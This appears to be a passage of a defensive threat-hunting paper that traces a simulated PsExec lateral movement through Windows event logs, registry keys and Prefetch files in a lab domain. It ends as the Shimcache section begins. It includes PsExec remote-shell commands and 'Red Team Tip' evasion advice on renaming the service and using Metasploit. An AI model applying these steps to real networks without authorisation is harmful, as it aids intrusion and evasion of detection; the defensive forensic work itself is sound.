

Hunting Red Team Activities with Forensic Artifacts



By Haboob Team Research@haboob.sa cybersecurity professional services

Table of Contents

1.	Intr	ntroduction						
2.	Why Threat Hunting?							
3.	Windows Forensic							
4.	4. LAB Environment Demonstration							
4	.1	Red Team	6					
4	.2	Blue Team	6					
4	.3	LAB Overview	6					
5.	Sce	narios	7					
5	.1	Remote Execution Tool (Psexec)	7					
5	.2	PowerShell Suspicious Commands	16					
5	.3	Dumping NTDS.dit File	20					
5	.4	Persistence with Schedule Task	22					
5	.5	Persistence with Autorun	25					
5	.6	Dumping LSASS Process (Procdump)	29					
6.	Hur	nting with SIEM	31					
6	.1	Psexec Use Case	31					
6	.2	Suspicious Commands Use Case	31					
6	.3	Dumping NTDS.dit file Use Case	31					
6	.4	Procdump Use Case	31					
7.	Hur	nting Tips	32					
8.	. Conclusion							
9.	P. References							

Table of Figures

Figure 1. Psexec Suspicious Command	7
Figure 2. Windows Event ID (4648) from Source Machine	8
Figure 3. Windows Event ID (4624) from Destination Machine	9
Figure 4. Windows Event ID (4672) from Destination Machine	9
Figure 5. PSEXESVC File on the Target Machine	10
Figure 6. PSEXESVC Windows Event ID (7045) from Destination Machine	10
Figure 7. Registry Value for the Service (PSEXESVC)	11
Figure 8. Registry Value for the Psexec Execution from Source Machine	11
Figure 9. Psexec Command with the Switch (-r)	12
Figure 10. HaboobSVC File on the Target Machine	12
Figure 11. Psexec Module on Metasploit	13
Figure 12. Registry Value for the Service (HaboobSVC)	13
Figure 13. Prefetch Files	14
Figure 14. Prefetch Files (Psexec)	14
Figure 15. Shimcache Results	15
Figure 16. Shimcache Results for PSEXESVC.	15
Figure 17. PowerShell Event ID (600)	16
Figure 18. Microsoft-Windows-PowerShell Event ID (4104)	16
Figure 19. Suspicious Script 1 - Microsoft-Windows-PowerShell Event ID (4104)	17
Figure 20. Suspicious Script 2 - Microsoft-Windows-PowerShell Event ID (4104)	17
Figure 21. Suspicious Script 3 - Microsoft-Windows-PowerShell Event ID (4104)	18
Figure 22. PowerShell History File Location	18
Figure 23. The Content of the PowerShell History File	19
Figure 24. Attacker Successfully Connected to DC - Windows Security Event ID (4648)	19
Figure 25. Vssadmin Command and Copy NTDS.dit	20
Figure 26. Shadow Copy Event – System Event ID (7036)	20
Figure 27. Vssadmin Process - Security Event ID (4904)	21
Figure 28. VSS Shadow Copy - Application Event ID (13)	21
Figure 29. Registry Value for Shadow Copies Information	21
Figure 30. "update_software" Task Schedule - TaskScheduler Event ID (106)	22
Figure 31. "update_software" Task Schedule - TaskScheduler Event ID (100)	22
Figure 32. "update_software" Task File	23
Figure 33. "update_software" File Content	23
Figure 34. "update.bat" File	24
Figure 35. "update.bat" File Content	24

Figure 36. VirusTotal Results	24
Figure 37. Explorer Export Autorun	25
Figure 38. "ExeExporrt" File Location	25
Figure 39. Comparing the Two Files	26
Figure 40. Autorun Sysinternals	26
Figure 41. Yara Rule for (ExtExporrt.exe)	27
Figure 42. Yara Rule Command	27
Figure 43. AmcacheParser.exe Command	28
Figure 44. Amcache Results	28
Figure 45. Procdump Basic Command	29
Figure 46. Registry Key for Procdump Activity	29
Figure 47. Prefetch Results for Procdump	30
Figure 48. YARA Rule to Detect LSASS DMP File	30
Figure 49. YARA Results	30

1. Introduction

A lot of enterprise networks are under attack or they already have been attacked by the adversaries. Red teamers or attackers tend to compromise the environments with new ways and rely on legitimate tools with sophisticated techniques based on their skill levels. On the other hand, the job of the blue teamers becomes more challenging and difficult as the attacker only needs to be successful once to gain access. The blue teamers need to proactively search for evidence of compromise in the environment and think like "the red teamers" in order to detect and hunt their activities and their techniques across the network and the endpoints. In this research paper, we demonstrated some of the red team activities that based on real life scenarios. We have discussed about various forensic artifacts for hunting the malicious actors and their traces. We also gave an overview about the Yara Rule for detecting the malwares and the malicious files. At the end of this paper, we created some effective SIEM use cases for the sake of hunting, monitoring and detecting the demonstrated scenarios as well as some hunting tips.

2. Why Threat Hunting?

Many enterprises nowadays are not aware about the different types of the activities that exist on their network and in the environment. In fact, they don't know actually if they have been attacked by some adversaries or some of their servers are compromised. Also, they don't know if there are attackers that living on their network as well as what the attackers have been doing so far over the environment (like collecting data, stealing confidential material, obtaining login credential for lateral movements activities). With the Threat Hunting, you can proactively search for any suspicious or malicious activities and look for any signs of attacks or compromises over the endpoints and the network. Also, the threat hunting digs deep to find malicious actors in your environment that stealthy remain in the network which will minimize the risk of an environment and decrease the number of the damage.

3. Windows Forensic

You can't protect what you don't know about, and understanding forensic capabilities and artifacts is a core component of information security. In Windows forensic analysis, you'll recover, analyze, and authenticate forensic data on Windows systems, track particular user activity on your network, and organize findings for use in incident response, compromised assessment, internal investigations, and civil/criminal litigation. Whether you know it or not, Windows is silently recording an unbelievable amount of data about you and your users.

4. LAB Environment Demonstration

4.1 Red Team

In order to understand what the red teamers can do in the network and what are the various techniques and activities that can be achieved, we have built a custom lab environment dedicated for this purpose and we have simulated some of the red team activities based on real life scenarios. We'll suppose that an attacker or a red teamer has an initial access to the network, and hence we will make such malicious activities that can be achieved by the red teamers (like lateral movements activities) on some of the machines of the network.

4.2 Blue Team

On the other hand, we will also simulate the role of the blue teamers and how they can hunt the red team activities based on the scenarios that we have created, and what the appropriate ways to investigate, collect and analyze some of the forensic artifacts that can lead the blue teamers to hunt the red teamers and how to track their activities and the traces left by the red team.

4.3 LAB Overview

To make it clear, this is a simple overview of the LAB environment:

- Domain Controller Server: DC-01 (Active Directory).
- Windows 7 Client: PC-01 (Domain-Joined Machine)
- Windows 10 Client: PC-02 (Domain-Joined Machine)
- Firewall (For Internet Access).
- Kali Linux (Attacking Machine).

Note that for the Kali Linux machine, we will use it only to demonstrate one kind of lateral movement technique. However, most of the red team activities that we simulated on this LAB are based on legitimate/native tools provided by Windows.

The Network information of the LAB:

- Domain Name: Haboob.local
- IP Range: 10.10.10.0/24

In this LAB environment, we will suppose that there is no security solution in place on the network or in the endpoints (like EDR, SIEM, AV, etc.). In fact, we will rely only on the default Windows logs and artifacts for the purpose of collecting data and investigating the suspicious activities. However, we are going to use some Open-Source tools that can help us (as a blue team) to analyze some of the forensic artifacts.

5. Scenarios

In this section, we are going to demonstrate some of real life scenarios for hunting and investigating a number of red team activities. As mentioned previously, we will suppose that a red teamer has an initial access to the network and has made some malicious activities over the machines of the domain.

5.1 Remote Execution Tool (Psexec)

Nowadays, many of the red teamers are dealing with such Remote Execution Tools to execute their commands remotely and get their jobs done and they rely on the default tools (administrator tools) that are whitelisted on most of the cases. We will start our scenarios with the Psexec tool. Psexec is a legitimate tool provided by Sysinternals from Microsoft and it's being used by most of the administrators on Windows environments. The attackers usually use this tool to do their malicious activities like lateral movements across the environment and execute commands remotely. A basic command to get a cmd.exe session is by using the below command (as shown in figure 1):

C:\Users\Rayan\Desktop\SysinternalsSuite <mark>></mark> PsExec64.exe \\10.10.10.20 -u haboob.local\ali cmd.exe -accepteula
PsExec v2.2 - Execute processes remotely Copyright (C) 2001-2016 Mark Russinovich Sysinternals - www.sysinternals.com
Password:
Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved.
<u>C:\Windows\svs</u> tem32>hostname PC-01
C:\Windows\system32>ipconfig
Windows IP Configuration
Ethernet adapter Bluetooth Network Connection:
Media State Media disconnected Connection-specific DNS Suffix . :
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : Link-local IPv6 Address : fe80::44ae:af7f:259:d44a%11 IPv4 Address
Tunnel adapter isatap.{D3BC2D70-FC80-48EC-AF9E-DE22EE0959DD}:
Media State : Media disconnected Connection-specific DNS Suffix . :
Tunnel adapter isatap.{EE3290E7-E49A-4ADB-86C9-7039E0E3E75E}:
Media State Media disconnected Connection-specific DNS Suffix . :
C:\Windows\system32>whoami haboob\ali

Figure 1. Psexec Suspicious Command.

As you can see above, the attacker or the red teamer has executed the malicious command (from PC-02) and has successfully got a cmd session (PC-01) and has run such commands.

General Details A logon was attempted using explicit credentials. Subject: Account Name: Ali Account Name: Ali Account Domain: HABOOB(Ali Account Name: ali Account Name: a			
General Details A logon was attempted using explicit credentials. Subject: Subject: A count Name: Ali Account Name: Ali Account Name: Ali Account Nonse: Logon ID: 6000000000000000000000000000000000000	Event 4648	, Microsoft Windows security auditing.	
A logon was attempted using explicit credentials. Subject: Security ID: HABOOBVAI: Account Name: Ali Account Domain: HABOOB Logon GUID: 0x218E238 Logon GUID: (0000000-0000-0000-0000000000) Account Whose Credentials Were Used: Account Name: ali Account Name: ali PC-01.Haboob.local Process Information: PC-01.Haboob.local Process Information: PC-01.Haboob.local Process Information: Network Information: Network Information: Network Security Source: Microsoft Windows security Logged: 3/7/2020 7:33:04 PM Event ID: 4648 Task Category: Logon Level: Information Keywords: Audit Success User: N/A Computer PC-02.Haboob.local	General	Details	
Subject: Subject: Subject: Security ID: Account Name: Logon ID: Logon ID: Count Domain: Account Name: Account Name: PC-01.Haboob.local Process Information: PC-01.Haboob.local Process Information: PC-01.Haboob.local Process Information: Network Address: 10.10.10.20 Port: Add Account Name: Network Address: 10.10.10.20 Port: Add Source: Microsoft Windows security Source: Network Address: 10.10.10.20 Port: Add Source: Microsoft Windows security Source: N/A Computer: PC-02.Haboob.local Source: N/A Computer: PC-02.Haboob.local	A logo	n was attempted using explicit credenti	jals.
Subject: HABOOB\Ali Account Name: Ali Account Name: Ali Account Name: HABOOB Logon ID: 000000000000000000000000000000000000	(in this determination of the structure o	
Security ID: HABOOB/Ali Account Name: Ali Account Domain: HABOOB HABOOB Logon DD: 0x2182258 Logon GUID: (0000000-0000-0000-0000000000) Account Whose Credentials Were Used: Account Name: ali Account Name: ali Account Name: ali Account Momain: haboob.local Account Name: ali Account Name: ali Account Name: pli Account Name: ali Account Name: pli Account Name: pli (0000000-0000-0000-00000000000) Pli Target Server: Target Server Name: PC-01.Haboob.local Pc-01.Haboob.local Process Information: PC-01.Haboob.local Pc-01.Haboob.local Process Name: Network Information: 0x4 Process Name: Process Name: Network Address: 10.10.10.20 Port: 445 Port: 445 Source: Microsoft Windows security Logon Logon Level: Information Event ID: 4648 Task Category: Logon Level: Logon Level: Information Keywords:	Subjec	t:	
Account Name: Ali Account Omain: HABOOB Logon ID: 0/218228 Logon GUD: (0000000-0000-0000-0000-0000-0000-0000		Security ID: HABOOB	3\Ali
Account Domain: HABOOB Logon ID: 0/2182258 Logon GUID: (0000000-0000-0000-0000-0000000000) Account Whose Credentials Were Used: Account Domain: Account Name: ali Account Domain: haboob.local Logon GUID: (0000000-0000-0000-00000000000) Target Server: Target Server Name: Process Information: PC-01.Haboob.local Process Information: 0x4 Process Information: 0x4 Process Information: 0x4 Process Information: 0x4 Process Name: Network Address: 10.10.10.20 Port: 445 Source: Microsoft Windows security Source: Microsoft Windows security Source: Information Level: Information Level: Information Keywords: Audit Success User: N/A		Account Name: Ali	
Logon GUID: 02/18/238 Logon GUID: (0000000-0000-0000-0000-00000000000) Account Whose Credentials Were Used: Account Domain: haboob.local Logon GUID: (0000000-0000-0000-00000000000) Target Server: Target Server Name: PC-01.Haboob.local Process Information: PC-01.Haboob.local Process Information: Process Information: Network Information: Network Address: 10.10.10.20 Port: 445 Log Name: Security Source: Microsoft Windows security Logged: 3/7/2020 7:33:04 PM Event ID: 4648 Task Category: Logon Level: Information: Keywords: Audit Success User: N/A Computer: PC-02.Haboob.local		Account Domain: HABOOB	
Legen GUID: {0000000-0000-0000-0000-0000-0000000000		Logon ID: 0x218E25	18 0.000 0000 0000 000000000
Account Whose Credentials Were Used: Account Name: ali Account Domain: haboob.local Account Domain: Logon GUID: (0000000-0000-0000-0000-0000-0000-0000		Logon GUID: {0000000	0-000-0000-0000-00000000000000000000000
Account Name: ali Account Domain: haboob.local Logon GUID: {0000000-0000-0000-0000000000000000000	Accou	nt Whose Credentials Were Used:	
Account Domain: haboob.local Logon GUID: (0000000-0000-0000-00000000000) Target Server Name: PC-01.Haboob.local Process Information: PC-01.Haboob.local Process Information: 0x4 Process ID: 0x4 Port: 445 Source: Microsoft Windows security Logged: 3/7/2020 7:33:04 PM Event ID: 4648 Task Category: Logn Logn Level: Information Keywords: Judit Success User: User: N/A Computer:		Account Name: ali	
Logon GUID: {0000000-0000-0000-00000000000} Target Server: Target Server Name: Additional Information: PC-01.Haboob.local Process Information: PC-01.Haboob.local Process Information: 0x4 Process Name: 0x4 Network Information: 0x4 Port: 445 Log Name: Security Source: Microsoft Windows security Loged: 3/7/2020 7:33:04 PM Event ID: 4648 Task Category: Logon Level: Information Keywords: Audit Success User: N/A		Account Domain: haboob.le	local
Target Server: PC-01.Haboob.local Process Information: PC-01.Haboob.local Process Information: Ox4 Process Information: Ox4 Process Name: Network Information: Network Information: Ox4 Port: 445 Source: Microsoft Windows security Log Park: Security Source: Microsoft Windows security Log Park: Task Category: Log Name: Keywords: Addit Success User: N/A		Logon GUID: {0000000	0-0000-0000-000000000000000000000000000
Target Server: Target Server Name: PC-01.Haboob.local Additional Information: PC-01.Haboob.local Process Information: Process Information: Process Name: 0x4 Network Information: 0x4 Port: 445 Log Name: Security Source: Microsoft Windows security Logged: 3/7/2020 7:33:04 PM Event ID: 4648 Task Category: Logon Level: Information Very N/A Computer: PC-02.Haboob.local			
Larget Server Name: PC-01.Haboob.local Additional Information: PC-01.Haboob.local Process Information: Process ID: Process ID: 0x4 Process Name: Network Information: Network Address: 10.10.20 Port: Port: 445 Source: Microsoft Windows security Log Name: Security Source: Microsoft Windows security Log Or. Logon Event ID: 4648 Task Category: Logon Level: Information Keywords: Audit Success User: N/A	larget	Server:	
Process Information: Process ID: 0x4 Process Name: Network Information: Network Address: 10.10.10.20 Port: 445 Log Name: Security Source: Microsoft Windows security Logged: 3/7/2020 7:33:04 PM Event ID: 4648 Task Category: Logon Level: Information Keywords: Audit Success User: N/A Computer: PC-02.Haboob.local		Additional Information DC 01 Ha	aboob.iocal
Process Information: Process Name: Network Information: Network Address: 10.10.20 Port: 445 Source: Microsoft Windows security Log Name: Security Source: Microsoft Windows security Log Olame: Security Security: Security Source: Microsoft Windows security Log Olame: Security Security:		Additional Information: PC-01.Ha	1000.001
Process ID: 0x4 Process Name: Network Information: Network Address: 10.10.10.20 Port: Port: 445 Log Name: Security Source: Microsoft Windows security Logged: Source: Microsoft Windows security Logged: Event ID: 4648 Task Category: Level: Information Keywords: User: N/A Computer:	Proces	s Information:	
Process Name: Network Information: Network Address: 10.10.20 Port: 445 Log Name: Security Source: Microsoft Windows security Logged: 3/7/2020 7:33:04 PM Event ID: 4648 Task Category: Logon Level: Information Keywords: Audit Success User: N/A Computer: PC-02.Haboob.local		Process ID: 0x4	
Network Information: Network Address: 10.10.20 Port: Port: 445 Log Name: Security Source: Microsoft Windows security Logged: 3/7/2020 7:33:04 PM Event ID: 4648 Task Category: Logon Level: Information Keywords: Audit Success User: N/A Computer: PC-02.Haboob.local		Process Name:	
Network Address: 10.10.10.20 Port: 445 Log Name: Security Source: Microsoft Windows security Logged: 3/7/2020 7:33:04 PM Event ID: 4648 Task Category: Logon Level: Information Keywords: Audit Success User: N/A		de la Commentina de	
Port: 445 Log Name: Security Source: Microsoft Windows security Logged: 3/7/2020 7:33:04 PM Event ID: 4648 Task Category: Logon Level: Information Keywords: Audit Success User: N/A Computer: PC-02.Haboob.local	Netwo	Network Address 10 10 10 20	
Log Name: Security Source: Microsoft Windows security Logged: 3/7/2020 7:33:04 PM Event ID: 4648 Task Category: Logon Level: Information Keywords: Audit Success User: N/A Computer: PC-02.Haboob.local		Port: 445	
Log Name:SecuritySource:Microsoft Windows securityLogged:3/7/2020 7:33:04 PMEvent ID:4648Task Category:LogonLevel:InformationKeywords:Audit SuccessUser:N/AComputer:PC-02.Haboob.local		1014 415	
Log Name: Security Source: Microsoft Windows security Logged: 3/7/2020 7:33:04 PM Event ID: 4648 Task Category: Logon Level: Information Keywords: Audit Success User: N/A Computer: PC-02.Haboob.local			
Source: Microsoft Windows security Logged: 3/7/2020 7:33:04 PM Event ID: 4648 Task Category: Logon Level: Information Keywords: Audit Success User: N/A Computer: PC-02.Haboob.local	Log Na	me: Security	
Event ID: 4648 Task Category: Logon Level: Information Keywords: Audit Success User: N/A Computer: PC-02.Haboob.local	Source:	Microsoft Windows securit	ity Logged: 3/7/2020 7:33:04 PM
Level: Information Keywords: Audit Success User: N/A Computer: PC-02.Haboob.local	Event ID	9: 4648	Task Category: Logon
User: N/A Computer: PC-02.Haboob.local	Level:	Information	Keywords: Audit Success
	User:	N/A	Computer: PC-02.Haboob.local

We can detect this activity from Windows Events on the source machine (PC-02):

Figure 2. Windows Event ID (4648) from Source Machine.

On the above event, you can see that the event type is (Security Event) and the event ID is 4648 and all the details of this activity that captured from the source machine like the user being used to execute command (Haboob\Ali), the target server which (PC-01.Haboob.local) and the IP of the server (10.10.10.20) as well as the time of the activity and the source of machine.

We can also detect this activity from the destination machine with two event IDs (4624, 4672):

event 4624, Microsoft Windows security auditing.								
General D. + 1								
Details								
An account was successfully logo	n account was successfully longed on.							
Subject:								
Security ID:	NULL SID							
Account Name:								
Logon ID:	0x0							
Logon Tunor	2							
Logon Type:	2							
New Logon:								
Security ID:	HABOOB\Ali							
Account Name:	Ali							
Account Domain:	Ove14cc3	-						
Logon GUID:	{00000000-0000-0000-00	00-000000000000000000000000000000000000						
		· · · · · · · · · · · · · · · · · · ·						
Process Information:								
Process ID:	0x0							
Process Name:	-							
Network Information:								
Workstation Name:	PC-02							
Source Network Addres	s: 10.10.10.30							
Source Port:	49800							
,								
Log Name: Security								
Source: Microsoft Wir	ndows security Logged:	3/7/2020 8:52:58 PM						
Event ID: 4624	Task Catego	ory: Logon						
Level: Information	Keywords:	Audit Success						
User: N/A	Computer:	PC-01.Haboob.local						

Figure 3. Windows Event ID (4624) from Destination Machine.

E	Event 4672, Microsoft Windows security auditing.									
Γ	General Details									
Special privileges assigned to new logon.										
Cubicat										
	Subject	Security ID: HABOOB	Ali							
		Account Name: Ali								
	1 L	Account Domain: HABOOB								
		Logon ID: 0xe14cc3								
	Privileges	: SeSecurityPrivilege								
		SeBackupPrivilege								
		SeRestorePrivilege								
		Se LakeOwnershipPr SeDebugPrivilege	ivilege							
		SeSvstemEnvironme	ntPrivilege							
		SeLoadDriverPrivile	le							
		SeImpersonatePrivil	ege							
	Log Name	: Security								
	Source:	Microsoft Windows security	Logged:	3/7/2020 8:52:58 PM						
	Event ID:	4672	Task Category:	Special Logon						
	Level:	Information	Keywords:	Audit Success						
	User:	N/A	Computer:	PC-01.Haboob.local						

Figure 4. Windows Event ID (4672) from Destination Machine.

There is an artificat to know if the psexec has ever been run by any user or not. Basically whenver a user executes a command, a Psexec service will be generated on the target machine and will leave a file on the path C:\Windows with the name (PSEXESVC):

J Computer + Local Disk (C) + Windows +									
Organize ▼ Include in library ▼ Share with ▼ New folder									
🔆 Favorites	Name	Date modified	Туре	Size					
🧮 Desktop	Tasks	7/14/2009 8:08 AM	File folder						
🐌 Downloads	Temp	3/7/2020 8:53 PM	File folder						
📃 Recent Places	\mu tracing	7/14/2009 5:34 AM	File folder						
	🐌 twain_32	7/14/2009 8:32 AM	File folder						
门 Libraries	👪 Vss	7/14/2009 6:20 AM	File folder						
Documents	퉬 Web	7/14/2009 8:32 AM	File folder						
J Music	winsxs	3/2/2020 2:43 PM	File folder						
Pictures	bfsvc	11/21/2010 6:24 AM	Application	70 KB					
🛃 Videos	bootstat.dat	3/3/2020 6:38 PM	DAT File	66 KB					
	DtcInstall	3/3/2020 12:44 AM	Text Document	3 KB					
💻 Computer	ᇘ explorer	11/21/2010 6:24 AM	Application	2,805 KB					
	fveupdate	7/14/2009 4:39 AM	Application	15 KB					
📬 Network	🕜 HelpPane	7/14/2009 4:39 AM	Application	717 KB					
	😰 hh	7/14/2009 4:39 AM	Application	17 KB					
	imib.bin	7/14/2009 2:06 AM	BIN File	43 KB					
	🗿 msdfmap	6/10/2009 11:36 PM	Configuration sett	2 KB					
	notepad	7/14/2009 4:39 AM	Application	189 KB					
	PFRO	3/3/2020 6:38 PM	Text Document	5 KB					
	PSEXESVC	3/7/2020 8:53 PM	Application	159 KB					
	💣 regedit	7/14/2009 4:39 AM	Application	417 KB					
	i setupact	3/3/2020 6:38 PM	Text Document	22 KB					
	📄 setuperr	7/14/2009 7:51 AM	Text Document	0 KB					

Figure 5. PSEXESVC File on the Target Machine.

It will also generate an event of a service that has been created (from system events) for the same service (PSEXECSVC.exe) with the event ID (7045):

E	Event 7045, Service Control Manager									
Γ	General Details									
	becans									
	A service was insta	alled in the system.								
	Convice Names DEEVESUC									
	Service File Name:	: %SystemRoot%\PSEXESVC.e	xe							
	Service Type: user	r mode service								
	Service Start Type:	: demand start								
	Service Account.	Localoystern								
	Log Name	Sustan								
	Log Name:	System	Learned	2 /7 /2020 9-52-59 DM						
	Source:	Service Control Manager	Loggea:	3/1/2020 8:52:58 PIVI						
	Event ID:	/045	Task Category:	None						
	Level:	Information	Keywords:	Classic						
	User:	HABOOB\Ali	Computer:	PC-01.Haboob.local						

Figure 6. PSEXESVC Windows Event ID (7045) from Destination Machine.

💣 Re	egistry	Editor					
File	Edit	View	Favorites Help				
			 PolicyAgent PortProxy Power PptpMiniport Processor ProfSvc ProtectedStorage Psched PSEXESVC pvscsi 	Name (Default) (Default) DisplayName ErrorControl ImagePath ObjectName Start Type	Type REG_SZ REG_SZ REG_DWORD REG_EXPAND_SZ REG_SZ REG_DWORD REG_DWORD	Data (value not set) PSEXESVC 0x0000000 (0) %SystemRoot%\PSEXESVC.exe LocalSystem 0x00000003 (3) 0x00000010 (16)	
			⊳ <mark>]}</mark> ql2300				

You can also detect the creation of this service on the below registry key:

Figure 7. Registry Value for the Service (PSEXESVC).

Speaking of the registry, there is an artifact in which you can detect any Sysinternals tool (Psexec in our case). The registry value will log the first execution of the tool (after accepting the Eula in the command line or in GUI):



Figure 8. Registry Value for the Psexec Execution from Source Machine.

As you can see in figure 8, the registry has logged a value for the Sysinternals tool (Psexec) when it has been executed for the first time on the source machine. This also will help you to know if any of the Sysinternals tools has ever been executed on a machine.

Red Team Tip 1: you can change the service name to another name so you can avoid some detection mechanisms used by security solutions. You can use the switch (-r) along with the name of the service you want to be created on the target machine:

C:\Users\Rayan\Desktop\SysinternalsSuite>PsExec64.exe \\10.10.10.20 -u haboob.local\ali -r HaboobSVC cmd.exe -accepteula
PSExec v2.2 - Execute processes remotely Copyright (C) 2001-2016 Mark Russinovich Sysinternals - www.sysinternals.com
Password:
Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix .: Link-local IPv6 Address : fe80::44ae:af7f:259:d44a%11 IPv4 Address : 10.10.10.20 Subnet Mask : 255.255 NS5.0 Default Gateway : 10.10.10.1
Tunnel adapter isatap.{D3BC2D70-FC80-48EC-AF9E-DE22EE0959DD}:
Media State Media disconnected Connection-specific DNS Suffix . :
C:\Windows\system32>whoami haboob\ali
C:\Windows\system32>hostname PC-01



The result is a new service name (HaboobSVC):

G ↓ Computer → Local Disk (C:) → Windows →											
Organize 🔻 🧊 Open 👻 Print New folder											
🖌 Favorites	Name	Date modified	Туре	Size							
E Deskton	鷆 TAPI	7/14/2009 7:57 AM	File folder								
Downloads	퉬 Tasks	7/14/2009 8:08 AM	File folder								
Recent Places	퉬 Temp	3/7/2020 10:51 PM	File folder								
incent hores	퉬 tracing	7/14/2009 5:34 AM	File folder								
📇 Libraries	퉬 twain_32	7/14/2009 8:32 AM	File folder								
Documents	🌗 Vss	7/14/2009 6:20 AM	File folder								
- Music	퉬 Web	7/14/2009 8:32 AM	File folder								
Pictures	퉬 winsxs	3/7/2020 9:21 PM	File folder								
Videos	🔲 bfsvc	11/21/2010 6:24 AM	Application	70 KB							
Videos	bootstat.dat	3/7/2020 9:07 PM	DAT File	66 KB							
Computer	DtcInstall	3/3/2020 12:44 AM	Text Document	3 KB							
1 computer	j explorer	11/21/2010 6:24 AM	Application	2,805 KB							
🔂 Network	💷 fveupdate	7/14/2009 4:39 AM	Application	15 KB							
THEWORK	HaboobSVC	3/7/2020 10:51 PM	Application	159 KB							
	🕜 HelpPane	7/14/2009 4:39 AM	Application	717 KB							

Figure 10. HaboobSVC File on the Target Machine.

This is a good way to avoid some of the detection techniques used by the blue team. Think about if there is a rule to detect any file created with the name (PSEXESVC), with the switch (-r), the service name will be changed to a custom name chosen by the malicious user.

Red Team Tip 2: there is a famous module on the Metasploit which will create a random service name and then it will be deleted automatically on the same time. This also will help you to avoid some detection mechanisms used by security solutions:



Figure 11. Psexec Module on Metasploit.

As a blue teamer, you have to be careful with the above red teaming techniques and always check the path C:\Windows for any created abnormal file with a suspicious name, also you can check the registry value to detect any random service name like the one we just created (HaboobSVC):

Registry Editor			
File Edit View Favorites Help			
⊳ - 📙 Fs_Rec	Name	Туре	Data
FsDepends	(Default)	REG_SZ	(value not set)
p 🕌 fvevol	ab DisplayName	REG_SZ	HaboobSVC
p gagp30kx	88 ErrorControl	REG_DWORD	0x00000000 (0)
GoogleChromeElevationService	ab ImagePath	REG_EXPAND_SZ	%SystemRoot%\HaboobSVC.exe
p	ab ObjectName	REG_SZ	LocalSystem
gupdate	300 Start	REG_DWORD	0x0000003 (3)
HaboobSVC	😻 Туре	REG_DWORD	0x00000010 (16)
⊳ hcw85cir			

Figure 12. Registry Value for the Service (HaboobSVC).

Windows Prefetch Artifact:

We can hunt the Psexec activity from a known artifact which is (Prefetch). Windows Prefetch is a memory management feature introduced in Windows XP and Windows Server 2003. It is used to speed up the Windows boot process and the application startup process. The Prefetch are stored under %SystemRoot%\Prefetch. Prefetch files contain various metadata, like: executable name, run count, volume information, files and directories referenced by the executable, and of course, timestamps.

PF WinPrefetchView							- 0 ×
File Edit View Option	s Help						
🗙 🔚 🖉 🖻 🖼 🖏	-71						
Filename /	Created Time	Modified Time	File Size	Process EXE	Process Path	Run Counter	Last Run Time
CORSSUPDATE.EXE-9F	3/7/2020 7:40:08 PM	3/7/2020 7:40:08 PM	1,881	OSRSSUPDATE.EXE	C:\Windows\Temp\266373781\OSRSSUPDATE.EXE	1	3/7/2020 7:39:58 PM
PING.EXE-167FE968.pf	3/2/2020 3:04:36 PM	3/3/2020 10:43:25 AM	2,967	PING.EXE	C:\Windows\System32\PING.EXE	10	3/3/2020 10:43:24 AM, 3/3/2020 10:40:49 AM, 3/3/2020 10:40:48 AM, 3/3/2020 10:40:45 AM
POWERSHELL.EXE-02	3/4/2020 7:09:33 PM	3/5/2020 8:09:20 PM	40,027	POWERSHELL.EXE	C:\Windows\System32\WINDOWSPOWERSHELL\v1.0\POWERSHELL.EXE	5	3/5/2020 8:09:10 PM, 3/4/2020 7:11:34 PM, 3/4/2020 7:11:25 PM, 3/4/2020 7:10:45 PM, 3/4/
PSEXEC64.EXE-74B005	3/7/2020 7:33:04 PM	3/7/2020 8:53:06 PM	6,109	PSEXEC64.EXE	C:\Users\Rayan\Desktop\SYSINTERNALSSUITE\PsExec64.exe	4	3/7/2020 8:52:56 PM, 3/7/2020 7:39:45 PM, 3/7/2020 7:39:40 PM, 3/7/2020 7:32:54 PM
PYTHON.EXE-59CFA7	3/5/2020 8:05:42 PM	3/7/2020 8:37:01 PM	13,883	PYTHON.EXE	C:\Python27\python.exe	14	3/7/2020 8:37:00 PM, 3/7/2020 8:30:01 PM, 3/7/2020 7:48:19 PM, 3/5/2020 8:14:21 PM, 3/5/
RDSPNF.EXE-7F7D409	3/2/2020 2:10:50 PM	3/2/2020 2:10:50 PM	6,950	RDSPNF.EXE	C:\Windows\System32\RDSPnf.exe	1	3/2/2020 2:10:43 PM
REG.EXE-6A8B6960.pf	3/4/2020 7:11:08 PM	3/7/2020 8:29:25 PM	7,889	REG.EXE	C:\Windows\System32\reg.exe	15	3/7/2020 8:29:25 PM, 3/7/2020 7:50:00 PM, 3/7/2020 7:47:40 PM, 3/5/2020 8:13:58 PM, 3/5/
REG.EXE-CC1AF0A4.pf	3/7/2020 7:42:17 PM	3/7/2020 7:42:17 PM	2,794	REG.EXE	C:\Windows\SysWOW64\reg.exe	5	3/7/2020 7:42:17 PM, 3/7/2020 7:42:17 PM, 3/7/2020 7:42:17 PM, 3/7/2020 7:42:17 PM, 3/7/
REGEDIT.EXE-246AC2	3/3/2020 9:57:39 PM	3/3/2020 9:58:34 PM	7,294	REGEDIT.EXE	C:\Windows\regedit.exe	2	3/3/2020 9:58:24 PM, 3/3/2020 9:57:29 PM

Figure 13. Prefetch Files.

Properties	×
Filename:	PSEXEC64.EXE-74B005EB.pf
Created Time:	3/7/2020 7:33:04 PM
Modified Time:	3/7/2020[8:53:06 PM
File Size:	6,109
Process EXE:	PSEXEC64.EXE
Process Path:	C:\Users\Rayan\Desktop\SYSINTERNALSSUITE\PsE
Run Counter:	4
Last Run Time:	3/7/2020 8:52:56 PM, 3/7/2020 7:39:45 PM, 3/7/2020
Missing Process:	No
	OK

Figure 14. Prefetch Files (Psexec).

We can clarify that there are a number of executed files (as shown in figure 13), one of them is Psexec tool. You can also see how many times the Psexec has been run, the path of the file, and last run times (figure 14). Prefetch is a great forensic artifact which any DFIR specialist or blue teamer has to use it in order to hunt their enemies.

Shimcache Artifact:

Shimcache, also known as AppCompatCache, is a component of the Application Compatibility Database, which was created by Microsoft and used by the Windows operating system to identify application compatibility issues. This helps developers troubleshoot legacy functions and contains data related to Windows features. It is used for quick search to decide whether modules need shimming for compatibility or not. The ShimCache stores various metadata, such as: File Full Path, File Size, Last Modified time, Process Execution Flag.

As a threat hunter, we can hunt the Psexec activity (and other activities) with Shimcache:

